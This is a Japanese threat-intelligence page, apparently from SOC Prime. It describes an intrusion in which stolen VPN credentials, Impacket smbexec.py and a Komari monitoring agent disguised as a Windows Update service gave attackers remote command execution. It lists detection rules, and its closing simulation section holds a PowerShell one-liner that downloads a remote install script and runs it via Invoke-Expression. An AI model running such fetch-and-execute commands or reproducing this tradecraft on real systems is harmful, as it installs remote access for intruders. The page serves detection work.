SOC Prime Bias: 重大

30 Apr 2026 14:19 UTC

Komari: 武器化の必要がなかった “モニタリング” ツール

Author Photo
SOC Prime Team linkedin icon フォローする
Komari: 武器化の必要がなかった “モニタリング” ツール
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

脅威アクターが盗まれたVPN資格情報を使用してHuntressパートナーのWindowsワークステーションにアクセスし、RDPを有効にして、NSSMを通じてWindows Update Serviceに偽装したSYSTEMレベルのサービスとしてオープンソースのKomari監視エージェントをデプロイしました。インストールされると、このエージェントは攻撃者が制御するインフラストラクチャとの持続的なWebSocket接続を確立し、コマンド実行、ターミナルアクセス、ハートビート方式のピングなどの機能を提供しました。実際、このツールは追加の武器化を必要としない軽量のコマンドアンドコントロールフレームワークとして機能しました。

調査

侵入は次の場所からのSSL VPNログインで始まりました 45.153.34.132、その後、Impacketの smbexec.py を使用してRDPを有効にし、一連のリモートコマンドを実行しました。調査官は、PowerShellワンライナーが直接GitHubからKomariインストーラーをダウンロードし、Windowsサービスとして登録したことを発見しました。そのサービスは次に komari-agent.exeを起動し、攻撃者のサーバーにWebSocketセッションを開き、ホスト上で任意のリモートコマンド実行を可能にしました。

緩和策

Huntressは、妥協されたワークステーションを隔離し、影響を受けたユーザーアカウントを無効にし、NSSMが作成したKomariサービスを停止することで対応しました。悪意のあるWebSocket接続がブロックされ、持続メカニズムがシステムから削除されました。推奨されるフォローアップ防御策には、VPNアクセス制御の強化、疑わしいサービス作成イベントの監視、アウトバウンドWebSocket活動の調査、およびRDPセキュリティの強化が含まれます。

対応

Windows Update Serviceとして名前が付けられたWindowsサービスの作成を検出し、それが komari-agent.exeを指している場合、見慣れないホストへの長時間存続するアウトバウンドWebSocket接続を監視し、横移動のためのImpacketツールの使用に警告します。 smbexec.py が特定された場合、影響を受けたエンドポイントは直ちに封じ込め、妥協した資格情報を取り消し、不正なサービスを環境から除去すべきです。

アタックフロー

検出

Impacketコマンドラインパターンの可能性(cmdline経由)

SOC Primeチーム
2026年4月30日

Impacketを使用したリモートコード実行の可能性(cmdline経由)

SOC Primeチーム
2026年4月30日

バイパス実行ポリシーを使用して怪しいディレクトリにファイルを実行するPowershell(cmdline経由)

SOC Primeチーム
2026年4月30日

Powershellを介したダウンロードまたはアップロード(cmdline経由)

SOC Primeチーム
2026年4月30日

リモートデスクトップサービスのシャドウイングの可能性(process_creation経由)

SOC Primeチーム
2026年4月30日

CLIを通じた疑わしいファイアウォール変更(cmdline経由)

SOC Primeチーム
2026年4月30日

コマンドラインにURLを使用する疑わしいプロセス(cmdline経由)

SOC Primeチーム
2026年4月30日

代替リモートアクセス/管理ソフトウェア(process_creation経由)

SOC Primeチーム
2026年4月30日

検出するためのIOC(HashSha256):Komari:武器化を必要としなかった「監視」ツール

SOC Prime AI Rules
2026年4月30日

検出するためのIOC(SourceIP):Komari:武器化を必要としなかった「監視」ツール

SOC Prime AI Rules
2026年4月30日

検出するためのIOC(DestinationIP):Komari:武器化を必要としなかった「監視」ツール

SOC Prime AI Rules
2026年4月30日

Impacket smbexec.pyおよびcmd.exeの実行の検出(RDP経由)[Windowsプロセス作成]

SOC Prime AI Rules
2026年4月30日

KomariエージェントインストールのPowerShell実行[Windows PowerShell]

SOC Prime AI Rules
2026年4月30日

Windows Update Serviceを介したKomariエージェントの持続性を検出する[Windowsシステム]

SOC Prime AI Rules
2026年4月30日

無許可のSSLVPNアクセスおよび妥協後の活動の検出[ファイアウォール]

SOC Prime AI Rules
2026年4月30日

シミュレーション実行

前提条件:テレメトリ&ベースラインのプリフライトチェックが合格している必要があります。

  • 攻撃の説明とコマンド:
    敵はWindowsホストに足がかりを得て、Komari C2エージェントをインストールして持続性を維持し、後で資格情報(T1003.001)をダンプしようとしています。従来のスクリプトブロッキング防御を回避するために、攻撃者は -ExecutionPolicy Bypass を使用してPowerShellを実行し、公開されているGitHubリポジトリから直接インストーラーをダウンロードします。このコマンドラインは検出ルールに正確に一致し、予期されたテレメトリを生成します。

  • 回帰テストスクリプト:

    # Komariエージェントインストールシミュレーション
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • クリーンアップコマンド:

    # シミュレーションインストーラーによって作成されたファイルを削除する(ある場合)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # 開始したかもしれないKomariプロセスを停止する
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force